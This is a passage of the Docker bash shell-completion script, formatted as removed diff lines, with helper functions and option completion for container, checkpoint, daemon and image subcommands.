syntax - [ "${words[$counter]}" = "=" ] && (( counter++ )) - else - case "${words[$counter]}" in - -*) - ;; - *) - break - ;; - esac - fi - - # Bash splits words at "=", retaining "=" as a word, examples: - # "--debug=false" => 3 words, "--log-opt syslog-facility=daemon" => 4 words - while [ "${words[$counter + 1]}" = "=" ] ; do - counter=$(( counter + 2)) - done - - (( counter++ )) - done - - echo $counter -} - -# __docker_map_key_of_current_option returns `key` if we are currently completing the -# value of a map option (`key=value`) which matches the extglob given as an argument. -# This function is needed for key-specific completions. -__docker_map_key_of_current_option() { - local glob="$1" - - local key glob_pos - if [ "$cur" = "=" ] ; then # key= case - key="$prev" - glob_pos=$((cword - 2)) - elif [[ $cur == *=* ]] ; then # key=value case (OSX) - key=${cur%=*} - glob_pos=$((cword - 1)) - elif [ "$prev" = "=" ] ; then - key=${words[$cword - 2]} # key=value case - glob_pos=$((cword - 3)) - else - return - fi - - [ "${words[$glob_pos]}" = "=" ] && ((glob_pos--)) # --option=key=value syntax - - [[ ${words[$glob_pos]} == @($glob) ]] && echo "$key" -} - -# __docker_value_of_option returns the value of the first option matching `option_glob`. -# Valid values for `option_glob` are option names like `--log-level` and globs like -# `--log-level|-l` -# Only positions between the command and the current word are considered. -__docker_value_of_option() { - local option_extglob=$(__docker_to_extglob "$1") - - local counter=$((command_pos + 1)) - while [ $counter -lt $cword ]; do - case ${words[$counter]} in - $option_extglob ) - echo ${words[$counter + 1]} - break - ;; - esac - (( counter++ )) - done -} - -# __docker_to_alternatives transforms a multiline list of strings into a single line -# string with the words separated by `|`. -# This is used to prepare arguments to __docker_pos_first_nonflag(). -__docker_to_alternatives() { - local parts=( $1 ) - local IFS='|' - echo "${parts[*]}" -} - -# __docker_to_extglob transforms a multiline list of options into an extglob pattern -# suitable for use in case statements. -__docker_to_extglob() { - local extglob=$( __docker_to_alternatives "$1" ) - echo "@($extglob)" -} - -# __docker_subcommands processes subcommands -# Locates the first occurrence of any of the subcommands contained in the -# first argument. In case of a match, calls the corresponding completion -# function and returns 0. -# If no match is found, 1 is returned. The calling function can then -# continue processing its completion. -# -# TODO if the preceding command has options that accept arguments and an -# argument is equal ot one of the subcommands, this is falsely detected as -# a match. -__docker_subcommands() { - local subcommands="$1" - - local counter=$(($command_pos + 1)) - while [ $counter -lt $cword ]; do - case "${words[$counter]}" in - $(__docker_to_extglob "$subcommands") ) - subcommand_pos=$counter - local subcommand=${words[$counter]} - local completions_func=_docker_${command}_${subcommand} - declare -F $completions_func >/dev/null && $completions_func - return 0 - ;; - esac - (( counter++ )) - done - return 1 -} - -# __docker_nospace suppresses trailing whitespace -__docker_nospace() { - # compopt is not available in ancient bash versions - type compopt &>/dev/null && compopt -o nospace -} - -__docker_complete_resolved_hostname() { - command -v host >/dev/null 2>&1 || return - COMPREPLY=( $(host 2>/dev/null "${cur%:}" | awk '/has address/ {print $4}') ) -} - -__docker_local_interfaces() { - command -v ip >/dev/null 2>&1 || return - ip addr show scope global 2>/dev/null | sed -n 's| \+inet \([0-9.]\+\).* \([^ ]\+\)|\1 \2|p' -} - -__docker_complete_local_interfaces() { - local additional_interface - if [ "$1" = "--add" ] ; then - additional_interface="$2" - fi - - COMPREPLY=( $( compgen -W "$(__docker_local_interfaces) $additional_interface" -- "$cur" ) ) -} - -__docker_complete_capabilities() { - # The list of capabilities is defined in types.go, ALL was added manually. - COMPREPLY=( $( compgen -W " - ALL - AUDIT_CONTROL - AUDIT_WRITE - AUDIT_READ - BLOCK_SUSPEND - CHOWN - DAC_OVERRIDE - DAC_READ_SEARCH - FOWNER - FSETID - IPC_LOCK - IPC_OWNER - KILL - LEASE - LINUX_IMMUTABLE - MAC_ADMIN - MAC_OVERRIDE - MKNOD - NET_ADMIN - NET_BIND_SERVICE - NET_BROADCAST - NET_RAW - SETFCAP - SETGID - SETPCAP - SETUID - SYS_ADMIN - SYS_BOOT - SYS_CHROOT - SYSLOG - SYS_MODULE - SYS_NICE - SYS_PACCT - SYS_PTRACE - SYS_RAWIO - SYS_RESOURCE - SYS_TIME - SYS_TTY_CONFIG - WAKE_ALARM - " -- "$cur" ) ) -} - -__docker_complete_detach-keys() { - case "$prev" in - --detach-keys) - case "$cur" in - *,) - COMPREPLY=( $( compgen -W "${cur}ctrl-" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "ctrl-" -- "$cur" ) ) - ;; - esac - - __docker_nospace - return - ;; - esac - return 1 -} - -__docker_complete_isolation() { - COMPREPLY=( $( compgen -W "default hyperv process" -- "$cur" ) ) -} - -__docker_complete_log_drivers() { - COMPREPLY=( $( compgen -W " - awslogs - etwlogs - fluentd - gcplogs - gelf - journald - json-file - logentries - none - splunk - syslog - " -- "$cur" ) ) -} - -__docker_complete_log_options() { - # see docs/reference/logging/index.md - local awslogs_options="awslogs-region awslogs-group awslogs-stream" - local fluentd_options="env fluentd-address fluentd-async-connect fluentd-buffer-limit fluentd-retry-wait fluentd-max-retries labels tag" - local gcplogs_options="env gcp-log-cmd gcp-project labels" - local gelf_options="env gelf-address gelf-compression-level gelf-compression-type labels tag" - local journald_options="env labels tag" - local json_file_options="env labels max-file max-size" - local logentries_options="logentries-token" - local syslog_options="env labels syslog-address syslog-facility syslog-format syslog-tls-ca-cert syslog-tls-cert syslog-tls-key syslog-tls-skip-verify tag" - local splunk_options="env labels splunk-caname splunk-capath splunk-format splunk-gzip splunk-gzip-level splunk-index splunk-insecureskipverify splunk-source splunk-sourcetype splunk-token splunk-url splunk-verify-connection tag" - - local all_options="$fluentd_options $gcplogs_options $gelf_options $journald_options $logentries_options $json_file_options $syslog_options $splunk_options" - - case $(__docker_value_of_option --log-driver) in - '') - COMPREPLY=( $( compgen -W "$all_options" -S = -- "$cur" ) ) - ;; - awslogs) - COMPREPLY=( $( compgen -W "$awslogs_options" -S = -- "$cur" ) ) - ;; - fluentd) - COMPREPLY=( $( compgen -W "$fluentd_options" -S = -- "$cur" ) ) - ;; - gcplogs) - COMPREPLY=( $( compgen -W "$gcplogs_options" -S = -- "$cur" ) ) - ;; - gelf) - COMPREPLY=( $( compgen -W "$gelf_options" -S = -- "$cur" ) ) - ;; - journald) - COMPREPLY=( $( compgen -W "$journald_options" -S = -- "$cur" ) ) - ;; - json-file) - COMPREPLY=( $( compgen -W "$json_file_options" -S = -- "$cur" ) ) - ;; - logentries) - COMPREPLY=( $( compgen -W "$logentries_options" -S = -- "$cur" ) ) - ;; - syslog) - COMPREPLY=( $( compgen -W "$syslog_options" -S = -- "$cur" ) ) - ;; - splunk) - COMPREPLY=( $( compgen -W "$splunk_options" -S = -- "$cur" ) ) - ;; - *) - return - ;; - esac - - __docker_nospace -} - -__docker_complete_log_driver_options() { - local key=$(__docker_map_key_of_current_option '--log-opt') - case "$key" in - fluentd-async-connect) - COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) - return - ;; - gelf-address) - COMPREPLY=( $( compgen -W "udp" -S "://" -- "${cur##*=}" ) ) - __docker_nospace - return - ;; - gelf-compression-level) - COMPREPLY=( $( compgen -W "1 2 3 4 5 6 7 8 9" -- "${cur##*=}" ) ) - return - ;; - gelf-compression-type) - COMPREPLY=( $( compgen -W "gzip none zlib" -- "${cur##*=}" ) ) - return - ;; - syslog-address) - COMPREPLY=( $( compgen -W "tcp:// tcp+tls:// udp:// unix://" -- "${cur##*=}" ) ) - __docker_nospace - __ltrim_colon_completions "${cur}" - return - ;; - syslog-facility) - COMPREPLY=( $( compgen -W " - auth - authpriv - cron - daemon - ftp - kern - local0 - local1 - local2 - local3 - local4 - local5 - local6 - local7 - lpr - mail - news - syslog - user - uucp - " -- "${cur##*=}" ) ) - return - ;; - syslog-format) - COMPREPLY=( $( compgen -W "rfc3164 rfc5424 rfc5424micro" -- "${cur##*=}" ) ) - return - ;; - syslog-tls-ca-cert|syslog-tls-cert|syslog-tls-key) - _filedir - return - ;; - syslog-tls-skip-verify) - COMPREPLY=( $( compgen -W "true" -- "${cur##*=}" ) ) - return - ;; - splunk-url) - COMPREPLY=( $( compgen -W "http:// https://" -- "${cur##*=}" ) ) - __docker_nospace - __ltrim_colon_completions "${cur}" - return - ;; - splunk-gzip|splunk-insecureskipverify|splunk-verify-connection) - COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) - return - ;; - splunk-format) - COMPREPLY=( $( compgen -W "inline json raw" -- "${cur##*=}" ) ) - return - ;; - esac - return 1 -} - -__docker_complete_log_levels() { - COMPREPLY=( $( compgen -W "debug info warn error fatal" -- "$cur" ) ) -} - -__docker_complete_restart() { - case "$prev" in - --restart) - case "$cur" in - on-failure:*) - ;; - *) - COMPREPLY=( $( compgen -W "always no on-failure on-failure: unless-stopped" -- "$cur") ) - ;; - esac - return - ;; - esac - return 1 -} - -# __docker_complete_signals returns a subset of the available signals that is most likely -# relevant in the context of docker containers -__docker_complete_signals() { - local signals=( - SIGCONT - SIGHUP - SIGINT - SIGKILL - SIGQUIT - SIGSTOP - SIGTERM - SIGUSR1 - SIGUSR2 - ) - COMPREPLY=( $( compgen -W "${signals[*]} ${signals[*]#SIG}" -- "$( echo $cur | tr '[:lower:]' '[:upper:]')" ) ) -} - -__docker_complete_user_group() { - if [[ $cur == *:* ]] ; then - COMPREPLY=( $(compgen -g -- "${cur#*:}") ) - else - COMPREPLY=( $(compgen -u -S : -- "$cur") ) - __docker_nospace - fi -} - -_docker_docker() { - # global options that may appear after the docker command - local boolean_options=" - $global_boolean_options - --help - --version -v - " - - case "$prev" in - --config) - _filedir -d - return - ;; - --log-level|-l) - __docker_complete_log_levels - return - ;; - $(__docker_to_extglob "$global_options_with_args") ) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "$boolean_options $global_options_with_args" -- "$cur" ) ) - ;; - *) - local counter=$( __docker_pos_first_nonflag "$(__docker_to_extglob "$global_options_with_args")" ) - if [ $cword -eq $counter ]; then - __docker_is_experimental && commands+=(${experimental_commands[*]}) - COMPREPLY=( $( compgen -W "${commands[*]} help" -- "$cur" ) ) - fi - ;; - esac -} - -_docker_attach() { - _docker_container_attach -} - -_docker_build() { - _docker_image_build -} - - -_docker_checkpoint() { - local subcommands=" - create - ls - rm - " - local aliases=" - list - remove - " - __docker_subcommands "$subcommands $aliases" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_checkpoint_create() { - case "$prev" in - --checkpoint-dir) - _filedir -d - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--checkpoint-dir --help --leave-running" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--checkpoint-dir') - if [ $cword -eq $counter ]; then - __docker_complete_containers_running - fi - ;; - esac -} - -_docker_checkpoint_ls() { - case "$prev" in - --checkpoint-dir) - _filedir -d - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--checkpoint-dir --help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--checkpoint-dir') - if [ $cword -eq $counter ]; then - __docker_complete_containers_all - fi - ;; - esac -} - -_docker_checkpoint_rm() { - case "$prev" in - --checkpoint-dir) - _filedir -d - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--checkpoint-dir --help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--checkpoint-dir') - if [ $cword -eq $counter ]; then - __docker_complete_containers_all - elif [ $cword -eq $(($counter + 1)) ]; then - COMPREPLY=( $( compgen -W "$(__docker_q checkpoint ls "$prev" | sed 1d)" -- "$cur" ) ) - fi - ;; - esac -} - - -_docker_container() { - local subcommands=" - attach - commit - cp - create - diff - exec - export - inspect - kill - logs - ls - pause - port - prune - rename - restart - rm - run - start - stats - stop - top - unpause - update - wait - " - local aliases=" - list - ps - " - __docker_subcommands "$subcommands $aliases" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_container_attach() { - __docker_complete_detach-keys && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--detach-keys --help --no-stdin --sig-proxy=false" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--detach-keys') - if [ $cword -eq $counter ]; then - __docker_complete_containers_running - fi - ;; - esac -} - -_docker_container_commit() { - case "$prev" in - --author|-a|--change|-c|--message|-m) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--author -a --change -c --help --message -m --pause=false -p=false" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--author|-a|--change|-c|--message|-m') - - if [ $cword -eq $counter ]; then - __docker_complete_containers_all - return - fi - (( counter++ )) - - if [ $cword -eq $counter ]; then - __docker_complete_image_repos_and_tags - return - fi - ;; - esac -} - -_docker_container_cp() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--follow-link -L --help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - case "$cur" in - *:) - return - ;; - *) - # combined container and filename completion - _filedir - local files=( ${COMPREPLY[@]} ) - - __docker_complete_containers_all - COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) ) - local containers=( ${COMPREPLY[@]} ) - - COMPREPLY=( $( compgen -W "${files[*]} ${containers[*]}" -- "$cur" ) ) - if [[ "$COMPREPLY" == *: ]]; then - __docker_nospace - fi - return - ;; - esac - fi - (( counter++ )) - - if [ $cword -eq $counter ]; then - if [ -e "$prev" ]; then - __docker_complete_containers_all - COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) ) - __docker_nospace - else - _filedir - fi - return - fi - ;; - esac -} - -_docker_container_create() { - _docker_container_run -} - -_docker_container_diff() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_containers_all - fi - ;; - esac -} - -_docker_container_exec() { - __docker_complete_detach-keys && return - - case "$prev" in - --env|-e) - # we do not append a "=" here because "-e VARNAME" is legal systax, too - COMPREPLY=( $( compgen -e -- "$cur" ) ) - __docker_nospace - return - ;; - --user|-u) - __docker_complete_user_group - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--detach -d --detach-keys --env -e --help --interactive -i --privileged -t --tty -u --user" -- "$cur" ) ) - ;; - *) - __docker_complete_containers_running - ;; - esac -} - -_docker_container_export() { - case "$prev" in - --output|-o) - _filedir - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --output -o" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_containers_all - fi - ;; - esac -} - -_docker_container_inspect() { - _docker_inspect --type container -} - -_docker_container_kill() { - case "$prev" in - --signal|-s) - __docker_complete_signals - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --signal -s" -- "$cur" ) ) - ;; - *) - __docker_complete_containers_running - ;; - esac -} - -_docker_container_logs() { - case "$prev" in - --since|--tail) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--details --follow -f --help --since --tail --timestamps -t" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--since|--tail') - if [ $cword -eq $counter ]; then - __docker_complete_containers_all - fi - ;; - esac -} - -_docker_container_list() { - _docker_container_ls -} - -_docker_container_ls() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - ancestor) - cur="${cur##*=}" - __docker_complete_images - return - ;; - before) - __docker_complete_containers_all --cur "${cur##*=}" - return - ;; - id) - __docker_complete_containers_all --cur "${cur##*=}" --id - return - ;; - health) - COMPREPLY=( $( compgen -W "healthy starting none unhealthy" -- "${cur##*=}" ) ) - return - ;; - is-task) - COMPREPLY=( $( compgen -W "true false" -- "${cur##*=}" ) ) - return - ;; - name) - __docker_complete_containers_all --cur "${cur##*=}" --name - return - ;; - network) - __docker_complete_networks --cur "${cur##*=}" - return - ;; - since) - __docker_complete_containers_all --cur "${cur##*=}" - return - ;; - status) - COMPREPLY=( $( compgen -W "created dead exited paused restarting running removing" -- "${cur##*=}" ) ) - return - ;; - volume) - __docker_complete_volumes --cur "${cur##*=}" - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -S = -W "ancestor before exited health id is-task label name network since status volume" -- "$cur" ) ) - __docker_nospace - return - ;; - --format|--last|-n) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--all -a --filter -f --format --help --last -n --latest -l --no-trunc --quiet -q --size -s" -- "$cur" ) ) - ;; - esac -} - -_docker_container_pause() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - __docker_complete_containers_running - ;; - esac -} - -_docker_container_port() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_containers_all - fi - ;; - esac -} - -_docker_container_prune() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) - ;; - esac -} - -_docker_container_ps() { - _docker_container_ls -} - -_docker_container_rename() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_containers_all - fi - ;; - esac -} - -_docker_container_restart() { - case "$prev" in - --time|-t) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --time -t" -- "$cur" ) ) - ;; - *) - __docker_complete_containers_all - ;; - esac -} - -_docker_container_rm() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--force -f --help --link -l --volumes -v" -- "$cur" ) ) - ;; - *) - for arg in "${COMP_WORDS[@]}"; do - case "$arg" in - --force|-f) - __docker_complete_containers_all - return - ;; - esac - done - __docker_complete_containers_stopped - ;; - esac -} - -_docker_container_run() { - local options_with_args=" - --add-host - --attach -a - --blkio-weight - --blkio-weight-device - --cap-add - --cap-drop - --cgroup-parent - --cidfile - --cpu-period - --cpu-quota - --cpu-rt-period - --cpu-rt-runtime - --cpuset-cpus - --cpus - --cpuset-mems - --cpu-shares -c - --device - --device-read-bps - --device-read-iops - --device-write-bps - --device-write-iops - --dns - --dns-option - --dns-search - --entrypoint - --env -e - --env-file - --expose - --group-add - --hostname -h - --init-path - --ip - --ip6 - --ipc - --isolation - --kernel-memory - --label-file - --label -l - --link - --link-local-ip - --log-driver - --log-opt - --mac-address - --memory -m - --memory-swap - --memory-swappiness - --memory-reservation - --name - --network - --network-alias - --oom-score-adj - --pid - --pids-limit - --publish -p - --restart - --runtime - --security-opt - --shm-size - --stop-signal - --stop-timeout - --storage-opt - --tmpfs - --sysctl - --ulimit - --user -u - --userns - --uts - --volume-driver - --volumes-from - --volume -v - --workdir -w - " - - local boolean_options=" - --disable-content-trust=false - --help - --init - --interactive -i - --oom-kill-disable - --privileged - --publish-all -P - --read-only - --tty -t - " - - if [ "$command" = "run" -o "$subcommand" = "run" ] ; then - options_with_args="$options_with_args - --detach-keys - --health-cmd - --health-interval - --health-retries - --health-timeout - " - boolean_options="$boolean_options - --detach -d - --no-healthcheck - --rm - --sig-proxy=false - " - __docker_complete_detach-keys && return - fi - - local all_options="$options_with_args $boolean_options" - - - __docker_complete_log_driver_options && return - __docker_complete_restart && return - - local key=$(__docker_map_key_of_current_option '--security-opt') - case "$key" in - label) - [[ $cur == *: ]] && return - COMPREPLY=( $( compgen -W "user: role: type: level: disable" -- "${cur##*=}") ) - if [ "${COMPREPLY[*]}" != "disable" ] ; then - __docker_nospace - fi - return - ;; - seccomp) - local cur=${cur##*=} - _filedir - COMPREPLY+=( $( compgen -W "unconfined" -- "$cur" ) ) - return - ;; - esac - - case "$prev" in - --add-host) - case "$cur" in - *:) - __docker_complete_resolved_hostname - return - ;; - esac - ;; - --attach|-a) - COMPREPLY=( $( compgen -W 'stdin stdout stderr' -- "$cur" ) ) - return - ;; - --cap-add|--cap-drop) - __docker_complete_capabilities - return - ;; - --cidfile|--env-file|--init-path|--label-file) - _filedir - return - ;; - --device|--tmpfs|--volume|-v) - case "$cur" in - *:*) - # TODO somehow do _filedir for stuff inside the image, if it's already specified (which is also somewhat difficult to determine) - ;; - '') - COMPREPLY=( $( compgen -W '/' -- "$cur" ) ) - __docker_nospace - ;; - /*) - _filedir - __docker_nospace - ;; - esac - return - ;; - --env|-e) - # we do not append a "=" here because "-e VARNAME" is legal systax, too - COMPREPLY=( $( compgen -e -- "$cur" ) ) - __docker_nospace - return - ;; - --ipc) - case "$cur" in - *:*) - cur="${cur#*:}" - __docker_complete_containers_running - ;; - *) - COMPREPLY=( $( compgen -W 'host container:' -- "$cur" ) ) - if [ "$COMPREPLY" = "container:" ]; then - __docker_nospace - fi - ;; - esac - return - ;; - --isolation) - __docker_complete_isolation - return - ;; - --link) - case "$cur" in - *:*) - ;; - *) - __docker_complete_containers_running - COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) ) - __docker_nospace - ;; - esac - return - ;; - --log-driver) - __docker_complete_log_drivers - return - ;; - --log-opt) - __docker_complete_log_options - return - ;; - --network) - case "$cur" in - container:*) - __docker_complete_containers_all --cur "${cur#*:}" - ;; - *) - COMPREPLY=( $( compgen -W "$(__docker_plugins_bundled --type Network) $(__docker_networks) container:" -- "$cur") ) - if [ "${COMPREPLY[*]}" = "container:" ] ; then - __docker_nospace - fi - ;; - esac - return - ;; - --pid) - case "$cur" in - *:*) - __docker_complete_containers_running --cur "${cur#*:}" - ;; - *) - COMPREPLY=( $( compgen -W 'host container:' -- "$cur" ) ) - if [ "$COMPREPLY" = "container:" ]; then - __docker_nospace - fi - ;; - esac - return - ;; - --runtime) - __docker_complete_runtimes - return - ;; - --security-opt) - COMPREPLY=( $( compgen -W "apparmor= label= no-new-privileges seccomp=" -- "$cur") ) - if [ "${COMPREPLY[*]}" != "no-new-privileges" ] ; then - __docker_nospace - fi - return - ;; - --storage-opt) - COMPREPLY=( $( compgen -W "size" -S = -- "$cur") ) - __docker_nospace - return - ;; - --user|-u) - __docker_complete_user_group - return - ;; - --userns) - COMPREPLY=( $( compgen -W "host" -- "$cur" ) ) - return - ;; - --volume-driver) - __docker_complete_plugins_bundled --type Volume - return - ;; - --volumes-from) - __docker_complete_containers_all - return - ;; - $(__docker_to_extglob "$options_with_args") ) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "$all_options" -- "$cur" ) ) - ;; - *) - local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) ) - if [ $cword -eq $counter ]; then - __docker_complete_images - fi - ;; - esac -} - -_docker_container_start() { - __docker_complete_detach-keys && return - - case "$prev" in - --checkpoint) - if [ __docker_is_experimental ] ; then - return - fi - ;; - --checkpoint-dir) - if [ __docker_is_experimental ] ; then - _filedir -d - return - fi - ;; - esac - - case "$cur" in - -*) - local options="--attach -a --detach-keys --help --interactive -i" - __docker_is_experimental && options+=" --checkpoint --checkpoint-dir" - COMPREPLY=( $( compgen -W "$options" -- "$cur" ) ) - ;; - *) - __docker_complete_containers_stopped - ;; - esac -} - -_docker_container_stats() { - case "$prev" in - --format) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--all -a --format --help --no-stream" -- "$cur" ) ) - ;; - *) - __docker_complete_containers_running - ;; - esac -} - -_docker_container_stop() { - case "$prev" in - --time|-t) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --time -t" -- "$cur" ) ) - ;; - *) - __docker_complete_containers_running - ;; - esac -} - -_docker_container_top() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_containers_running - fi - ;; - esac -} - -_docker_container_unpause() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_containers_unpauseable - fi - ;; - esac -} - -_docker_container_update() { - local options_with_args=" - --blkio-weight - --cpu-period - --cpu-quota - --cpu-rt-period - --cpu-rt-runtime - --cpuset-cpus - --cpuset-mems - --cpu-shares -c - --kernel-memory - --memory -m - --memory-reservation - --memory-swap - --restart - " - - local boolean_options=" - --help - " - - local all_options="$options_with_args $boolean_options" - - __docker_complete_restart && return - - case "$prev" in - $(__docker_to_extglob "$options_with_args") ) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "$all_options" -- "$cur" ) ) - ;; - *) - __docker_complete_containers_all - ;; - esac -} - -_docker_container_wait() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - __docker_complete_containers_all - ;; - esac -} - - -_docker_commit() { - _docker_container_commit -} - -_docker_cp() { - _docker_container_cp -} - -_docker_create() { - _docker_container_run -} - -_docker_daemon() { - local boolean_options=" - $global_boolean_options - --disable-legacy-registry - --experimental - --help - --icc=false - --init - --ip-forward=false - --ip-masq=false - --iptables=false - --ipv6 - --live-restore - --raw-logs - --selinux-enabled - --userland-proxy=false - " - local options_with_args=" - $global_options_with_args - --add-runtime - --api-cors-header - --authorization-plugin - --bip - --bridge -b - --cgroup-parent - --cluster-advertise - --cluster-store - --cluster-store-opt - --config-file - --containerd - --default-gateway - --default-gateway-v6 - --default-ulimit - --dns - --dns-search - --dns-opt - --exec-opt - --exec-root - --fixed-cidr - --fixed-cidr-v6 - --graph -g - --group -G - --init-path - --insecure-registry - --ip - --label - --log-driver - --log-opt - --max-concurrent-downloads - --max-concurrent-uploads - --mtu - --oom-score-adjust - --pidfile -p - --registry-mirror - --seccomp-profile - --shutdown-timeout - --storage-driver -s - --storage-opt - --userland-proxy-path - --userns-remap - " - - __docker_complete_log_driver_options && return - - key=$(__docker_map_key_of_current_option '--cluster-store-opt') - case "$key" in - kv.*file) - cur=${cur##*=} - _filedir - return - ;; - esac - - local key=$(__docker_map_key_of_current_option '--storage-opt') - case "$key" in - dm.blkdiscard|dm.override_udev_sync_check|dm.use_deferred_removal|dm.use_deferred_deletion) - COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) - return - ;; - dm.fs) - COMPREPLY=( $( compgen -W "ext4 xfs" -- "${cur##*=}" ) ) - return - ;; - dm.thinpooldev) - cur=${cur##*=} - _filedir - return - ;; - esac - - case "$prev" in - --authorization-plugin) - __docker_complete_plugins_bundled --type Authorization - return - ;; - --cluster-store) - COMPREPLY=( $( compgen -W "consul etcd zk" -S "://" -- "$cur" ) ) - __docker_nospace - return - ;; - --cluster-store-opt) - COMPREPLY=( $( compgen -W "discovery.heartbeat discovery.ttl kv.cacertfile kv.certfile kv.keyfile kv.path" -S = -- "$cur" ) ) - __docker_nospace - return - ;; - --config-file|--containerd|--init-path|--pidfile|-p|--tlscacert|--tlscert|--tlskey|--userland-proxy-path) - _filedir - return - ;; - --exec-root|--graph|-g) - _filedir -d - return - ;; - --log-driver) - __docker_complete_log_drivers - return - ;; - --storage-driver|-s) - COMPREPLY=( $( compgen -W "aufs btrfs devicemapper overlay overlay2 vfs zfs" -- "$(echo $cur | tr '[:upper:]' '[:lower:]')" ) ) - return - ;; - --storage-opt) - local btrfs_options="btrfs.min_space" - local devicemapper_options=" - dm.basesize - dm.blkdiscard - dm.blocksize - dm.fs - dm.loopdatasize - dm.loopmetadatasize - dm.min_free_space - dm.mkfsarg - dm.mountopt - dm.override_udev_sync_check - dm.thinpooldev - dm.use_deferred_deletion - dm.use_deferred_removal - " - local zfs_options="zfs.fsname" - - case $(__docker_value_of_option '--storage-driver|-s') in - '') - COMPREPLY=( $( compgen -W "$btrfs_options $devicemapper_options $zfs_options" -S = -- "$cur" ) ) - ;; - btrfs) - COMPREPLY=( $( compgen -W "$btrfs_options" -S = -- "$cur" ) ) - ;; - devicemapper) - COMPREPLY=( $( compgen -W "$devicemapper_options" -S = -- "$cur" ) ) - ;; - zfs) - COMPREPLY=( $( compgen -W "$zfs_options" -S = -- "$cur" ) ) - ;; - *) - return - ;; - esac - __docker_nospace - return - ;; - --log-level|-l) - __docker_complete_log_levels - return - ;; - --log-opt) - __docker_complete_log_options - return - ;; - --seccomp-profile) - _filedir json - return - ;; - --userns-remap) - __docker_complete_user_group - return - ;; - $(__docker_to_extglob "$options_with_args") ) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "$boolean_options $options_with_args" -- "$cur" ) ) - ;; - esac -} - -_docker_deploy() { - __docker_is_experimental && _docker_stack_deploy -} - -_docker_diff() { - _docker_container_diff -} - -_docker_events() { - _docker_system_events -} - -_docker_exec() { - _docker_container_exec -} - -_docker_export() { - _docker_container_export -} - -_docker_help() { - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - COMPREPLY=( $( compgen -W "${commands[*]}" -- "$cur" ) ) - fi -} - -_docker_history() { - _docker_image_history -} - - -_docker_image() { - local subcommands=" - build - history - import - inspect - load - ls - prune - pull - push - rm - save - tag - " - local aliases=" - images - list - remove - rmi - " - __docker_subcommands "$subcommands $aliases" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) 